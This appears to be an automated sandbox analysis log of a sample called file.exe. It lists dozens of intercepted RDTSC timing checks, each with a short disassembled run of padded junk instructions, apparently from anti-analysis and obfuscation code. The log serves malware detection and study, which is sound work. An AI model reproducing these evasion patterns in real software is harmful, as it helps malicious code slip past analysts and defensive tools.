      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EB198 second address: 5EB19C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5129 second address: 6B513A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A5Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B513A second address: 6B515C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC7C474F63Ah 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 jnp 00007FC7C474F636h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B515C second address: 6B5160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB0C6 second address: 6BB0E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C474F648h 0x00000009 ja 00007FC7C474F636h 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE44A second address: 6BE454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE454 second address: 6BE45A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE45A second address: 6BE45E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CD1E5 second address: 6CD1E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D566B second address: 6D566F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D566F second address: 6D56BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F648h 0x00000007 jmp 00007FC7C474F648h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007FC7C474F648h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D56BB second address: 6D56E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FC7C5219A5Dh 0x0000000f pushad 0x00000010 ja 00007FC7C5219A56h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D56E9 second address: 6D56EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D59BF second address: 6D59CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5B09 second address: 6D5B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5B0D second address: 6D5B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5E21 second address: 6D5E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FC7C474F642h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5E3C second address: 6D5E46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5FB3 second address: 6D5FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D5FB7 second address: 6D5FCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC7C5219A5Eh 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0063E second address: 4A0064F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0064F second address: 4A00653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00653 second address: 4A00659 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00659 second address: 4A00678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, F6AEh 0x00000007 mov di, CFBAh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebx+54h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC7C5219A5Ch 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00678 second address: 4A0067E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0067E second address: 4A0068F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0068F second address: 4A00693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00693 second address: 4A00697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00697 second address: 4A0069D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0069D second address: 4A006A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A006A3 second address: 4A006A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A006A7 second address: 4A006AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A006AB second address: 4A006C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7C474F63Eh 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A006C6 second address: 4A0072C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7C5219A61h 0x00000009 or si, D6F6h 0x0000000e jmp 00007FC7C5219A61h 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esi+1Ch], eax 0x0000001c pushad 0x0000001d movzx eax, bx 0x00000020 mov dl, B8h 0x00000022 popad 0x00000023 mov eax, dword ptr [ebx+5Ch] 0x00000026 jmp 00007FC7C5219A5Ch 0x0000002b mov dword ptr [esi+20h], eax 0x0000002e jmp 00007FC7C5219A60h 0x00000033 mov eax, dword ptr [ebx+60h] 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0072C second address: 4A00730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00730 second address: 4A00736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00736 second address: 4A0076D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7C474F642h 0x00000009 jmp 00007FC7C474F645h 0x0000000e popfd 0x0000000f mov dh, al 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov dword ptr [esi+24h], eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0076D second address: 4A007F4 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 516D5311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, 3B430F4Dh 0x0000000e popad 0x0000000f mov eax, dword ptr [ebx+64h] 0x00000012 jmp 00007FC7C5219A68h 0x00000017 mov dword ptr [esi+28h], eax 0x0000001a pushad 0x0000001b call 00007FC7C5219A5Eh 0x00000020 pushad 0x00000021 popad 0x00000022 pop eax 0x00000023 call 00007FC7C5219A61h 0x00000028 jmp 00007FC7C5219A60h 0x0000002d pop ecx 0x0000002e popad 0x0000002f mov eax, dword ptr [ebx+68h] 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FC7C5219A5Ah 0x0000003b add ah, 00000058h 0x0000003e jmp 00007FC7C5219A5Bh 0x00000043 popfd 0x00000044 mov ax, 1F0Fh 0x00000048 popad 0x00000049 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A007F4 second address: 4A00894 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7C474F63Bh 0x00000009 sbb ecx, 69C40D1Eh 0x0000000f jmp 00007FC7C474F649h 0x00000014 popfd 0x00000015 call 00007FC7C474F640h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [esi+2Ch], eax 0x00000021 pushad 0x00000022 jmp 00007FC7C474F647h 0x00000027 movzx ecx, bx 0x0000002a popad 0x0000002b mov ax, word ptr [ebx+6Ch] 0x0000002f jmp 00007FC7C474F63Bh 0x00000034 mov word ptr [esi+30h], ax 0x00000038 jmp 00007FC7C474F646h 0x0000003d mov ax, word ptr [ebx+00000088h] 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 mov edi, 34FEC1F0h 0x0000004c mov ebx, 69260D1Ch 0x00000051 popad 0x00000052 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00894 second address: 4A008B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov bl, ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov word ptr [esi+32h], ax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FC7C5219A60h 0x00000016 mov dh, cl 0x00000018 popad 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A008B8 second address: 4A008F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7C474F63Ah 0x00000009 or ah, FFFFFF98h 0x0000000c jmp 00007FC7C474F63Bh 0x00000011 popfd 0x00000012 mov si, DA4Fh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebx+0000008Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC7C474F641h 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A008F5 second address: 4A008FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A008FB second address: 4A008FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A008FF second address: 4A00923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+34h], eax 0x0000000b pushad 0x0000000c push edi 0x0000000d mov di, ax 0x00000010 pop esi 0x00000011 push edi 0x00000012 mov bl, al 0x00000014 pop edx 0x00000015 popad 0x00000016 mov eax, dword ptr [ebx+18h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx edx, cx 0x0000001f mov ax, C0A5h 0x00000023 popad 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00923 second address: 4A00995 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c jmp 00007FC7C474F646h 0x00000011 mov eax, dword ptr [ebx+1Ch] 0x00000014 jmp 00007FC7C474F640h 0x00000019 mov dword ptr [esi+3Ch], eax 0x0000001c jmp 00007FC7C474F640h 0x00000021 mov eax, dword ptr [ebx+20h] 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FC7C474F63Eh 0x0000002b add al, 00000078h 0x0000002e jmp 00007FC7C474F63Bh 0x00000033 popfd 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00995 second address: 4A009C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esi+40h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC7C5219A67h 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009C8 second address: 4A00A08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 0ACE85AAh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d lea eax, dword ptr [ebx+00000080h] 0x00000013 jmp 00007FC7C474F647h 0x00000018 push 00000001h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC7C474F640h 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A08 second address: 4A00A0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A0E second address: 4A00A6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FC7C474F640h 0x0000000f push eax 0x00000010 pushad 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 popad 0x00000016 nop 0x00000017 jmp 00007FC7C474F642h 0x0000001c lea eax, dword ptr [ebp-10h] 0x0000001f jmp 00007FC7C474F640h 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FC7C474F63Ah 0x0000002e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A6D second address: 4A00A73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A73 second address: 4A00AC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, bx 0x0000000e pushfd 0x0000000f jmp 00007FC7C474F63Dh 0x00000014 or eax, 3E465406h 0x0000001a jmp 00007FC7C474F641h 0x0000001f popfd 0x00000020 popad 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FC7C474F63Dh 0x00000029 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B3F second address: 4A00B93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC8356185C5h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC7C5219A63h 0x00000018 add esi, 2C90AD6Eh 0x0000001e jmp 00007FC7C5219A69h 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B93 second address: 4A00B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B98 second address: 4A00BEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-0Ch] 0x0000000c pushad 0x0000000d pushad 0x0000000e call 00007FC7C5219A62h 0x00000013 pop eax 0x00000014 mov ch, bl 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushfd 0x0000001a jmp 00007FC7C5219A5Ah 0x0000001f sub cx, 6E78h 0x00000024 jmp 00007FC7C5219A5Bh 0x00000029 popfd 0x0000002a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00BEC second address: 4A00BFD instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00BFD second address: 4A00C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C01 second address: 4A00C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C05 second address: 4A00C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C0B second address: 4A00C40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 17B688D8h 0x00000008 jmp 00007FC7C474F641h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 lea eax, dword ptr [ebx+78h] 0x00000013 jmp 00007FC7C474F63Eh 0x00000018 push 00000001h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C40 second address: 4A00C46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C46 second address: 4A00C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C474F63Bh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C55 second address: 4A00C8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov di, cx 0x00000010 mov edi, esi 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC7C5219A60h 0x0000001b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C8F second address: 4A00CA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bh, 4Ch 0x0000000f mov bl, ch 0x00000011 popad 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00CA7 second address: 4A00D19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7C5219A64h 0x00000009 and eax, 7FE95CB8h 0x0000000f jmp 00007FC7C5219A5Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FC7C5219A68h 0x0000001b or esi, 25119718h 0x00000021 jmp 00007FC7C5219A5Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a lea eax, dword ptr [ebp-08h] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FC7C5219A65h 0x00000034 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D19 second address: 4A00D29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C474F63Ch 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D29 second address: 4A00D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DBF second address: 4A00DC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DC4 second address: 4A00DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, ED72h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FC835618340h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DDB second address: 4A00DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DDF second address: 4A00DF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DF1 second address: 4A00DF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DF7 second address: 4A00DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00DFB second address: 4A00E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e jmp 00007FC7C474F63Eh 0x00000013 mov dword ptr [esi+08h], eax 0x00000016 jmp 00007FC7C474F640h 0x0000001b lea eax, dword ptr [ebx+70h] 0x0000001e jmp 00007FC7C474F640h 0x00000023 push 00000001h 0x00000025 jmp 00007FC7C474F640h 0x0000002a nop 0x0000002b jmp 00007FC7C474F640h 0x00000030 push eax 0x00000031 jmp 00007FC7C474F63Bh 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FC7C474F645h 0x0000003e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E8C second address: 4A00E92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E92 second address: 4A00E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E96 second address: 4A00E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00E9A second address: 4A00EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-18h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00EAB second address: 4A00EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00EAF second address: 4A00EBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00EBF second address: 4A00F02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push esi 0x0000000c pushfd 0x0000000d jmp 00007FC7C5219A5Bh 0x00000012 add al, FFFFFFAEh 0x00000015 jmp 00007FC7C5219A69h 0x0000001a popfd 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e mov edi, 03F28AC2h 0x00000023 rdtsc
